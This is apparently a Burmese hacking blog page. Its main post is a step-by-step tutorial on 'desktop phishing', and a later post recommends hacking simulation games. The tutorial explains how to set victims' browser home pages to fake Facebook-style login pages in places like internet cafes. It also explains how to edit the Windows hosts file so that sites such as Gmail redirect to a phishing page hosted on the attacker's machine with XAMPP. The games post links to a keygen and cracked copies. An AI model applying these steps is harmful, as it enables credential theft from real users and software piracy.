ဆိုတာေပၚေပါက္လာပါတယ္…….။
What is Desktop Phishing?
Desktop phishing ဆိုတာဟာ အလြယ္တကူေျပာရမယ္ဆိုရင္ သားေကာင္ေတြဆီ ကို phishing page link ေတြကို တိုက္ရိုက္ေပး ပို႕ျခင္းမရိွပဲ နဲ႕ ထိုလင့္ေတြကို သားေကာင္ေတြရဲ႕ စက္ထဲမွာပဲ ၀င္ေရာက္ေနရာယူႏိုင္ေအာင္ စီစဥ္ ေဆာင္ရြက္ ေပးျခင္းျဖစ္ပါတယ္…။နည္းလမ္းေတြကေတာ့ အမ်ိဳးမ်ိဳးရိွပါတယ္……အဓိက ကလိုတာေတာ့ ျဖတ္ထိုးညဏ္လို႕ ပဲ ေျပာျခင္ပါတယ္…..။အလြယ္ ဆံုးနည္းလမ္းကေတာ့ မိမိ duplicate page link ကို Browser ရဲ႕ home page မွာ၀င္ေျပာင္းထားလိုက္ရုံပါပဲ……..။သားေကာင္ဟာ Browser ကိုဖြင့္လိုက္တာနဲ႕ တန္းျပီးေတာ့ flake login page ကို တန္းေရာက္သြားမွာျဖစ္ပါတယ္….။ဥပမာ facebook page အတုလိုမ်ိဳးေပါ့…….။ဒါေပမယ့္လဲဒီနည္းက LAN area ထဲမွာပဲေကာင္းပါတယ္…။ အင္တာနက္ကဖီးလိုေနရာမ်ိဳးမွာေပါ့…..။ကို္ယ္သြားသံုးရင္းနဲ႕ flake pageခ်န္ခဲ့ေပါ့…..။ဒီနည္းကလဲသိပ္မထူးျခားပါဘူး…..ရိုးလြန္းပါတယ္…။ ေနာက္တစ္နည္းကေတာ့ host file ကိုေျပာင္းလဲ ျပင္ဆင္ ျခင္းပါ..။ဒီေနရာမွာလဲ Local attack နဲ႕ online attack လို႕ ခြဲျခားထားပါ့မယ္……..။
Host file replacing method
ဒီအမ်ိဳးအစားကေတာ့ Desktop phishing အမ်ိဳးအစားျဖစ္ျပီးေတာ့ window directory ထဲမွာရိွတဲ့ host file ထဲက text အခ်ိဳ႕ကို ေျပာင္းလဲ ျပင္ဆင္ျခင္းျဖစ္ပါတယ္……..။ေျပာရမယ္ဆိုရင္သားေကာင္ေတြဟာ အစစ္အမွန္ website ကိုသြားေပမယ့္လဲ လိုအပ္တဲ့ ေနရာကို မေရာက္ရွိ ပဲ hacker ေတြရဲ႕ duplicate page ေတြဆီကို တိုက္ရိုက္ေရာက္ရိွ ေအာင္ျပဳလုပ္ျခင္းပဲျဖစ္ပါတယ္…..။ပိုမိုနားလည္ေအာင္ ပံုႏွင့္တကြ ေဖာ္ျပေပးလိုက္ပါတယ္……။ေအာက္ေဖာ္ျပ ပါပံုေလးကေတာ့ သာမန္ phishing method နဲ႕ Desktop phishing method တို႕ ကြာ ျခားပံုေလးပဲျဖစ္ပါတယ္..။
Step to Perform Desktop Phishing
Necessaries
- Xampp (Download)
- Wnirar
- notepad or notepad++
- flake login page
- your iq
What is host file?
host file ဆိုတာဟာ ဖိုင္တစ္ခုျဖစ္ပါတယ္…..ကဲေအးေရာ….။ဘယ္မွာရိွလဲဆိုတာ ကေတာ့ C:\Windows\System32\drivers\etc\ အဲဒီလို သြားလိုက္ရင္ ေတြ႕ႏိုင္ပါတယ္….(မွတ္ခ်က္။ ။ကၽြန္ေတာ္ XP နဲ႕ပဲအသံုးျပဳေနျခင္းျဖစ္ပါတယ္…) ။သူကဘာလုပ္ေပးလဲ ဆိုေတာ့ ကၽြန္ေတာ္တို႕ ၀င္ ေရာက္ၾကည့္ရႈထားတဲ့ဆိုက္ေတြ ရဲ႕ Ip address နဲ႕ Domain name ေတြကိုမွတ္ထားပါတယ္…။လိုအပ္သလိုလဲေျပာင္းလဲလို႕ရပါတယ္…..။ အရွင္းဆံုး ေျပာရမယ္ဆိုရင္ ကၽြန္ေတာ္တို႕ရိုက္လိုက္တဲ့ Web လိပ္စာေတြကို IP နဲ႕ check ျပီးေတာ့ အဲဒါနဲ႕ ျပန္လည္ဆက္သြယ္ျပီး ျပန္လည္ခ်ျပ ေဖာ္ျပေပးတာျဖစ္ပါတယ္……။နဲနဲရႈပ္သြားတယ္ဆိုရင္လဲဒီလိုပဲမွတ္ထားေပးပါ…….။ေနာက္ေတာ့ မွ လုပ္ရင္းကိုင္ရင္ နားလည္သြားပါလိမ့္မယ္……။ဒီေလာက္ပဲရွင္းျပခ်င္ပါတယ္……တကယ္ရွင္းျပရရင္ေတာ့ ေတာ္ေတာ္ေလးက ပိုစ့္ကရွည္သြံားပါ လိမ့္မယ္….ဖတ္တဲ့သူေတြလဲ ျပင္ကုန္ၾကမွာေပါ့…..ဟီးဟီး။
အဲဒီ host ဖိုင္ေလးကိုေလ့လာလိုက္ၾကရေအာင္…။ကၽြန္ေတာ့္တို႕ အေနနဲ႕ window မွာပါတဲ့ notepad နဲ႕လဲ edit လုပ္လို႕ရသလို notepad++ ကိုလဲသံုးႏိုင္ပါေသးတယ္….။ၾကိဳက္တာနဲ႕ လုပ္ေပါ့ ….။ကၽြန္ေတာ္ကေတာ့ အဲဒီဖိုင္ေလးကို notepad ကိုပဲသံုးျပီးေတာ့ဖြင့္လိုက္ပါတယ္…။ျပီးေတာ့ ကၽြန္ေတာ္ဟာ Ip address တစ္ခုကိုျဖည့္လိုက္ျပီးေတာ့ သူနဲ႕သူတြဲ အလုပ္လုပ္မယ့္ URL ကိုျဖည့္လိုက္ပါတယ္…။ဒါဆိုရင္ေတာ့ သင္တစ္ခုေတာ့နား လာ္သြားပါလိမ့္မယ္……။ေအာက္ေဖာ္ျပပါ ပံုေလးကိုၾကည့္လိုက္ပါ….။ ကၽြန္ေတာ္ျပထားတဲ့ဥပမာ အတိုင္း www.anywebsite.com ကိုအလည္ သြားတဲ့အခါ သူ႕ရဲ႕ Ip address ကိုပါပူးတြဲမွတ္ေပးပါတယ္……….။
What is Attack?
ကၽြန္ေတာ္တို႕ အေနနဲ႕ web host ေတြကိုသံုးတဲ့အခါ ဥပမာ 110mb.com,ripway လိုဟာမ်ိဳးေပါ့……။ IP address ကိုေထာက္ပံမေပးပါဘူး…။
သူကသင့္ ဆိုက္ကိုဒါမ်ိဳးေထာက္ပံေပးပါတယ္…www.anything.110mb.com ။ဒါေၾကာင့္ ကၽြန္ေတာ့္တို႕ဟာ ကၽြန္ေတာ္တို႕ computer ကို phishing page ကို host ထားဖို႕ sever အျဖစ္ေျပာင္းဖို႕လိုအပ္ပါတယ္…..။ဒါကိုလို ဘယ္လို attack လုပ္မလဲဆိုရင္ ေအာက္ကပံုေလးကိုၾကည့္ လိုက္ပါ….။တစ္ခ်ိဳ႕ online host site ေတြ ip ေပးသလားဆိုတာကၽြန္ေတာ္ေတာ့ မေတြ႕ ဘူးေသးဘူး…..။ရိွခ်င္လဲရိွလိမ့္ပါမယ္…။
ကၽြန္ေတာ္တို႕ အထက္ကပံုေလးကို ၾကည့္လိုက္ပါ…….။ xxx.xxx.xxx.xxx ဆိုတာက ခုနက phishing page ကို host လုပ္ထားတဲ့ ip address ျဖစ္ပါတယ္…။ host file ထဲမွာျပန္ျပင္ထားတာပါ…..။သားေကာင္ေတြဟာ www.gmail.com ကိုသြားေပမယ့္လဲ သင္ သင့္ စက္ထဲမွာ host လုပ္ထားတဲ့ ip ဆီကိုပဲသြားမွာျဖစ္ပါတယ္…..ေျပာရရင္ သင့္ စက္ထဲမွာ host လုပ္ထားတဲ့ phishing page ဆီကိုပဲေရာက္သြားမွာျဖစ္ပါတယ္.. ဒါေၾကာင့္သင့္ စက္ထဲမွာ websever ျပဳလုပ္ျပီး webpage ေတြကို host ျပဳလုပ္ထားဖို႕လိုပါတယ္….။အဲဒီလိုလုပ္ ဖို႕ Xampp ကိုသံုးရပါမယ္…။
part 2 ေမွ်ာ္
posted by me
You also see Here
Confessions of Teenage Hackers:Part I :Mafia Boy
Download
မူရင္းစာေရးသူရဲ႕ ကိုယ္ေတြ႕မွတ္တမ္းျဖစ္ျပီး သူ႕ရဲ႕ဘ၀ဇာတ္ေၾကာင္းမွာ Hacking အေပၚထားရွိတဲ့သူ႕သေဘာထား သူ႕အျမင္ သူ႕အယူအဆ သူ႕ခံစားခ်က္ေတြအျပင္ အေမရိကန္ စစ္ဌာနခ်ဳပ္ ပင္တဂြန္ကို ေဖာက္ထြင္းဖို႕ၾကိဳးစားခဲ့ဖူးတဲ့သူ႕ရဲ႕ အေတြ႕အၾကံဳေတြမွာ ဖတ္ရႈရမွာျဖစ္ပါတယ္
မူရင္း.......Ghostarea.net
Wednesday, July 11, 2012
Hackers and Hacking Games
ဒီတစ္ေခါက္ေတာ့ Hacker တစ္ေယာက္အေနနဲ႕ ကစားရမယ့္ Game ေလးေတြ ျပန္လည္မွ်ေ၀လိုက္ပါတယ္ ။ Game ဆိုေပမယ့္ ဒီ Game ကေန သီအိုရီပိုင္းေတြကို သိနိုင္တယ္ ျပီးေတာ့ ကိုယ္မၾကံဳဖူးတဲ့ အျခားတစ္ေယာက္နဲ့ ယွဥ္ျပိဳင္မွုေတြကို ရနိုင္ပါတယ္။ ဒါ့အျပင္ Trace အလိုက္ခံရတာေတြ ျပိဳင္ဘက္ေတြနဲ႕ ယွဥ္ျပိဳင္ရတာေတြေၾကာင့္ လွ်ိဳ႕၀ွက္သည္းဖို ခံစားခ်က္ေတြကိုလည္း ရရွိႏုိင္မွာျဖစ္ပါတယ္ ။ 1. Blue Sky Simulation A/CBlue sky:: Acceptable Casualties ဆိုတဲ့ Hacking Simulation ကို exoSyphen Studios ကေရးဆြဲျပီး TermialZero ကေန publish လုပ္ပါတယ္။ ဒီဂိမ္းမွာေတာ့ graphic လဲေကာင္းပါတယ္။ ျပီးေတာ့ ဂိမ္းကစားေနတဲ့သူဟာ experienced Hacker တစ္ေယာက္အျဖစ္ အခ်ိန္ကိုက္ ေဆာ့နိုင္ရမွာျဖစ္ပါတယ္။ အခုတင္ေပးတာက Developer version ပါ။ အမွန္တကယ္ features အျပည့္အစံုေဆာ့ခ်င္ရင္ ေတာ့ 9.95$ ေလာက္ရွိပါတယ္။ purchase လုပ္ျပီးေဆာ့ရင္ custom interface skins ေတြ complete new game graphic ေတြရနိုင္ပါတယ္။ျပီးေတာ့ custom mission ေတြ levels နဲ့ game mods အသစ္ေတြ လဲ support လုပ္ပါတယ္ ။ Visual C++ 6.0 ရွိရင္ ပိုျပီး အလုပ္နုိင္ပါတယ္။ Developer version မွာေတာ့ source code ပဲပါလာမွာပါ။ ကိုယ့္ဘာသာကိုယ္ Visual C++နဲ့ ျပန္ေရးရမွာျဖစ္ပါတယ္။ တကယ္ programmer အတြက္ကေတာ့ အရမ္းေကာငး္တဲ့ စီစဥ္မွုတစ္ခုျဖစ္ပါတယ္။ run လို့ေကာင္းသြားရင္ CD နဲ့ Burn ျပီး install လုပ္ေပးရမွာခင္ဗ်ာ။ကိုယ္ေဆာ့မယ့္ hacking simulation ဂိမ္းေကာင္းတစ္ခု ကို ကိုယ္ပိုင္ဖန္တီးရတဲ့အရသာဟာ ဘာနဲ့မွ မလဲနိုင္တာေတြ့ရပါမယ္။ Download Link:: http://www.shareup.com/Blue_Sky_AC-download-10814.html
Digital Hazard
ဒီGame ဟာလဲ hacking simulator Game တစ္ခုျဖစ္ပါတယ္။ ExoSyphen Studio ကပဲ Develop လုပ္ပါတယ္။ ဒီတစ္ခါ ေဆာ့တဲ့လူက worldwide computer networking ထဲ ရဲ့အတြင္းမွာဘာရွိသလဲလို့စူးစမး္ရင္း Underground (ေျမၾကီးေအာက္မဟုတ္ပါ တရားဥပေဒ ေဘာင္မဝင္တဲ့ေလာကကို ေခၚသည္) ထဲေရာက္သြားပါတယ္။ အဲ့လိုနဲ့ Hacker တစ္ေယာက္အေနနဲ့ ကမၻာတစ္ပတ္ကို ေနရာတစ္ရာကေနေျခဆန့္ေနခိုက္ ESK ဆိုတဲ့ Organization တစ္ခုရဲ့ အတြင္းေရးကို Hack ရမွာျဖစ္ပါတယ္။ အလြန္ေကာင္းမြန္တဲ့ Graphic နဲ့ ထုတ္လုပ္ထားျပီး Avenue 5 မွ Sound track ေတြနဲ့တည္ေဆာက္ထားပါတယ္။ ဒီGame ဟာ အခ်ိန္ကို အသံုုးခ်တတ္ေအာင္ ျပီးေတာ့ စဥ္းစားဥာဏ္ရည္တက္ေအာင္ တီထြင္ထားပါတယ္။ ဒါတင္မကေသးပါဘူး ေဆာ့ေနသူကို အလြန္တ၇ာနက္တဲ့ ေခ်ာက္ရဲ့ကမ္းပါးေပၚမွာေလွ်ာက္ေနရသလို ခံစား၇ေအာင္ ရင္တလွပ္လွပ္နဲ့ေဆာ့နိုင္ ေအာင္လုပ္ထားပါတယ္။ ဒီGame သည္လဲ free မဟုတ္ေခ်။ ဒါေပမဲ့သူအတြက္ Crack generator ေတြရွိပါတယ္။ တစ္ခါတည္းတြဲတင္ေပးလုိက္ပါတယ္။ Full version မွာ ဆိုရင္ Custom Game မ်ားကို ေဆာ့နုိင္မွာ ျဖစ္ျပီး mods ေတြ lvl ေတြ missionေတြကို အသစ္ေတြရနိုင္မွာ ျဖစ္ပါတယ္။ addional missionေတြကို download ခ်ျပီးလဲေဆာ့နိုင္မွာျဖစ္ပါတယ္။ သတိထားတတ္ေအာင္ ျပီးေတာ့ တကယ့္ ကို စိတ္လွုပ္ရွားစရာေကာင္းေအာင္ အျပင္မွာ တကယ္hack ေနျပီး White Hat ေတြရန္က ေနေရွာင္ ေနရမွာျဖစ္ပါတယ္။ တကယ့္ကို Game ေကာင္းတစ္ခု ျဖစ္ပါတယ္ Download Link: http://games.brothersoft.com/digital-hazard.html Download Keygen Link: http://www.cracksguru.com/data/Digital_Hazard_v1.0_keygen_by_DELiGHT-bee5631c96.html
Hacker Evolution
အဲ့ဂိမ္းကေတာ့ နာမည္ေက်ာ္ game ေကာင္းတစ္ခုပါပဲ။ ေဆာ့ရတာ အခ်ိန္ကုန္မွန္းမသိေအာင္ကို ေကာင္းတဲ့ Game ပါ။ ExoSyphen Studio ကပဲ Develop လုပ္ပါတယ္။ Version မ်ားကိုလဲ အသစ္ထြက္ပါတယ္။ DDOSer သမားမ်ားအတြက္ တကယ့္ပညာရတဲ့ဂိမ္းပါ။ Sever ေတြကို linked လုပ္ျပီးကိုယ္ မေပၚနိုင္ေအာင္ ခ်ိတ္ရပါ့မယ္။ Sever ေတြကို ေဖာက္ရင္ လဲ Password အမ်ိဳးမ်ိဳးကို Crack ရပါမယ္။ ဘဏ္ Database ေတြတိုက္ျပီး Money hack ရပါတယ္။ ျပီးရင္ ရတဲ့ပိုက္ဆံနဲ့ Processors ေတြ Firewallေတြ ခံျပီး တစ္ပါးေသာ White hat Hacker group ရန္မွလဲကာကြယ္ရပါေသးတယ္။ ျပီးေတာ့ DDOS attack တင္ မဟုတ္ပါဘူး EMP attack ေတြပါ အမုန္းေကၽြးရပါေသးတယ္။ ဒီGame သည္လည္း အေရွ့က ထြက္ခဲ့တဲ့ Game လို ပဲ Sound ေရာ Graphic လဲေကာင္းပါတယ္။ Full version မွာ ဆိုရင္ Custom Game မ်ားကို ေဆာ့နုိင္မွာ ျဖစ္ျပီး mods ေတြ lvl ေတြ missionေတြကို အသစ္ေတြရနိုင္မွာ ျဖစ္ပါတယ္။ အဲ့ Game ကို ျပည္တြင္းက Excellent အေခြ ဆိုင္မွာ ဝယ္ယူလို့ရပါတယ္။ Crack Version ရနိုင္ပါတယ္။ တစ္ခုေတာ့မွာမယ္ေနာ္ ဒါေတြေဆာ့မယ္ဆိုရင္ေတာ့ terminal ကို ၾကည့္တတ္မွရမယ္ေနာ္။ Download Link ( Demo ) : http://crazy4warez.blogspot.com/2009/03/hacker-evolution-pc-free-game-download.html ဒီသံုးခုဟာ နာမည္ၾကီးသလို အလြန္လည္း မုိက္တယ္ Hacker Game သံုးခုျဖစ္ပါတယ္ အေတြ႕အၾကံဳတစ္ခုေတာ့ရမွာပါ စမ္းၾကည့္လိုက္ပါ
posted by Fortran
copy from ghostarea.net